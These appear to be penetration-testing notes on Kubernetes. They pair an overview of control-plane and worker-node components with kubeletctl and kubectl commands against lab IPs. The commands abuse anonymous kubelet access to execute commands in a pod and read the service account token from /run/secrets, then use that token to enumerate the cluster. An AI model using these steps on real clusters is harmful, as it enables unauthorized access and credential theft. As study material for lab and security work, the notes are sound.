Kubernetes

Container Orchestration Platform

Architecture

Kubernetes Control Plane

The brain of the Kubernetes cluster. It makes global decisions about the cluster and monitors the state of the cluster.

  • kube-apiserver

    • Is the central point of communication for all Kubernetes components.

    • It exposes the Kubernetes API and serves as the front-end for the Kubernetes control plane.

    • All interaction go through the API server.

    • It handles requests for cluster state and writes/read operations to/from etcd.

    • Handles authentication, authorization, and admission control.

  • etcd

    • Is a distributed key-value store used to store all cluster data and state:

      • Configuration of all resources.

      • The desired state.

      • The current state.

    • etcd ensures that the state is replicated across multiple nodes.

  • kube-controller-manager

    • Is a daemon that runs in the control plane and manages the controllers that regulate the state of the cluster.

    • Controllers are responsible for ensuring the desired state of the cluster matches the current state. If there’s a mismatch, controllers take action to reconcile that state:

      • For example, if a pod crashes, the replication controller will create a new pod to maintain the desired number of replicas.

    • Some key controllers include:

      • Deployment controller: Ensures the desired number of pod replicas are running.

      • Node controller: Monitors nodes for health and takes actions when nodes fail.

      • Job controller: Manages the execution of batch jobs.

  • kube-scheduler

    • Is responsible for scheduling pods to run on the worker nodes.

    • It watches for newly created pods that do not have a node assigned, and then selects the most appropriate node to run the pod based on resource requirements, node availability, and other constraints.

  • cloud-controller-manager

    • Interacts with the cloud provider’s API to manage resources such as:

      • Managing load balancers.

      • Handling cloud-specific features.

    • It abstracts the cloud provider-specific logic, allowing Kubernetes to be agnostic to the underlying infrastructure.

Kubernetes Worker Node

Worker nodes are the machines (either virtual or physical) that run the actual application workloads. A Kubernetes cluster can have multiple worker nodes, and each one runs several essential components:

  • Kubelet

    • Is an agent that runs on every worker node.

    • It ensures that the containers described in the pod specs are running and healthy.

    • Monitors the state of the node and the pods running on it. It communicates with the API server to report the status of the node and its workloads.

    • If a pod is not running as expected, the kubelet can restart it.

  • Kube Proxy

    • Is a network proxy that runs on every worker node.

    • It maintains network rules for pod communication, allowing services in the cluster to be accessed reliably.

    • It manages the service abstraction by routing traffic to the correct pods. If a service points to multiple pods, kube-proxy ensures the traffic is balanced between the pods using round-robin or other strategies.

  • Container Runtime

    • Responsible for running the containers on each node. It interacts directly with the underlying infrastructure (e.g., Docker, containerd, CRI-O).

    • When the kubelet schedules a pod, the container runtime is used to pull the container images and start the containers.

  • Pods

    • The smallest and most basic deployable objects in Kubernetes. A pod represents one or more containers running together on the same node.

    • Pods share the same network namespace, which means they can communicate with each other using localhost and share storage volumes.

    • Typically, a pod is used to run a single container, but it can also contain multiple containers that work closely together (e.g., a main app container and a helper container like a logging agent).


Ports and Protocols


Enumeration

List pods
kubeletctl pods -s 10.10.11.133
Running pods
kubeletctl runningpods -s 10.10.11.133 | jq -c '.items[].metadata | [.name, .namespace]'
  • kubelet can allow anonymous access, where may be possible to use the commands such as run and exec:

Scan Remote Command Execution
kubeletctl -s 10.129.96.98 scan rce
Spawn a reverse shell
kubeletctl -s 10.10.11.133 exec "/bin/bash" -p nginx -c nginx
  • Default directories where token and certificate are stored:

    • /var/run/secrets/kubernetes.io/serviceaccount

    • /run/secrets/kubernetes.io/serviceaccount

    • /secrets/kubernetes.io/serviceaccout

kubectl

  • Authorize to the API using the token and ca.crt to be able to use it; first save the token as an environmental variable to make it easier to work with:

export token=$(kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx)
  • Copy the ca.crt in a file locally and start enumerating:

Print info about the running pod
kubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token get pod
List namespaces
kubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token get namespaces
List resource services
kubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token cluster-info
List all permissions
kubectl auth can-i --list --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token

Exploitation

Last updated